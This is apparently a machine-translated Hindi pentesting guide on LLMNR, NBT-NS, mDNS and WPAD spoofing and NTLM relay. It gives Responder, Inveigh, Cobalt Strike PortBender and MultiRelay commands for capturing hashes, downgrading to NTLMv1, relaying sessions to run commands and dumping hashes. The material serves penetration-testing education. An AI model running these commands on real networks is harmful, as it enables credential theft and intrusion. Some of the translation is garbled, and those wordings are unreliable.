Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

नेटवर्क प्रोटोकॉल

स्थानीय होस्ट संकेतन प्रोटोकॉल

• LLMNR, NBT-NS, और mDNS:

• माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग स्थानीय नाम संकेतन के लिए करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।

• ये प्रोटोकॉल अपने अथेंटिकेटेड, यूडीपी पर प्रसारित प्रकृति के कारण अंतर्दृष्टि और स्पूफिंग के लिए संवेदनशील हैं।

• Responder का उपयोग करके होस्ट जो इन प्रोटोकॉलों का प्रश्न कर रहे हैं को झूठे जवाब भेजकर सेवाओं का अनुकरण किया जा सकता है।

• Responder का उपयोग करके सेवा अनुकरण के बारे में अधिक जानकारी यहाँ मिल सकती है।

वेब प्रॉक्सी ऑटो-डिस्कवरी प्रोटोकॉल (WPAD)

• WPAD ब्राउज़र को प्रॉक्सी सेटिंग्स को स्वचालित रूप से खोजने की अनुमति देता है।

• खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटता है।

• Responder WPAD अटैक को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है।

प्रोटोकॉल पॉइजनिंग के लिए Responder

• Responder एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी के लिए पॉइजनिंग के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।

• यह Kali Linux में पूर्व-स्थापित है, /etc/responder/Responder.conf में कॉन्फ़िगर किया जा सकता है।

• Responder द्वारा दर्ज किए गए हैश स्क्रीन पर प्रदर्शित करता है और उन्हें /usr/share/responder/logs निर्देशिका में सहेजता है।

• यह IPv4 और IPv6 दोनों का समर्थन करता है।

• Responder का Windows संस्करण यहाँ उपलब्ध है।

Responder चलाना

• डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: responder -I <Interface>

• अधिक प्रोबिंग के लिए (संभावित प्रभावों के साथ): responder -I <Interface> -P -r -v

• NTLMv1 चैलेंज/प्रतिक्रिया को आसानी से क्रैक करने के लिए तकनीकें: responder -I <Interface> --lm --disable-ess

• WPAD अनुकरण को सक्रिय करने के लिए: responder -I <Interface> --wpad

• NetBIOS अनुरोधों को हमलवर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: responder.py -I <interface> -Pv

Responder के साथ DHCP पॉइजनिंग

• DHCP प्रतिक्रियाओं को झूठलाने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन किया जा सकता है, ARP पॉइजनिंग के लिए एक गुप्त विकल्प प्रदान करता है।

• इसे लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है।

• हमले को चलाने के लिए: ./Responder.py -I eth0 -Pdv

• यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करना चाहिए।

Responder के साथ क्रेडेंशियल कैप्चर

• Responder उपरोक्त प्रोटोकॉलों का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है।

• क्रैकिंग के लिए NTLMv1 या ESS को अक्षम करने के लिए नेटNTLMv1 की ओर डाउनग्रेड करने की कोशिश की जा सकती है।

यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, सही अधिकारिकरण सुनिश्चित करते हुए और अवैध पहुंच या अनधिकृत पहुंच से बचते हुए।

Inveigh

Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टमों के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, Inveigh और InveighZero मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों को विकि में पाया जा सकता है।

Inveigh को PowerShell के माध्यम से चलाया जा सकता है:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

या C# बाइनरी के रूप में निष्पादित:

Inveigh.exe

NTLM रिले हमला

यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करता है एक लक्ष्य मशीन तक पहुंचने के लिए, सफल होने पर एक सिस्टम शैल प्रदान करता है। मुख्य आवश्यकताएं शामिल हैं:

• प्रमाणित करने वाले उपयोगकर्ता को रिले होस्ट पर स्थानीय व्यवस्थापक एक्सेस होना चाहिए।

• SMB साइनिंग को अक्षम कर दिया जाना चाहिए।

445 पोर्ट फॉरवर्डिंग और टनलिंग

उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल करने की आवश्यकता होती है। PortBender जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो जरुरी होता है जब ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध हो।

कोबाल्ट स्ट्राइक में PortBender सेटअप और ऑपरेशन:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

NTLM रिले हमले के लिए अन्य उपकरण

• Metasploit: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।

• smbrelayx: SMB सत्रों को रिले करने और कमांड या बैकडोअर लागू करने के लिए एक Python स्क्रिप्ट।

• MultiRelay: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने, या हैश डंप करने के लिए।

प्रत्येक उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संचालित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है।

MultiRelay ऑपरेशन

MultiRelay को /usr/share/responder/tools निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्ष्य बनाते हुए।

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

एनटीएलएम रिले हमले का प्रयास करें

Windows में आप कुछ विशेषाधिकारी खातों को अनियमित मशीनों पर प्रमाणीकृत करने के लिए सक्षम हो सकते हैं। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे:

संदर्भ

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html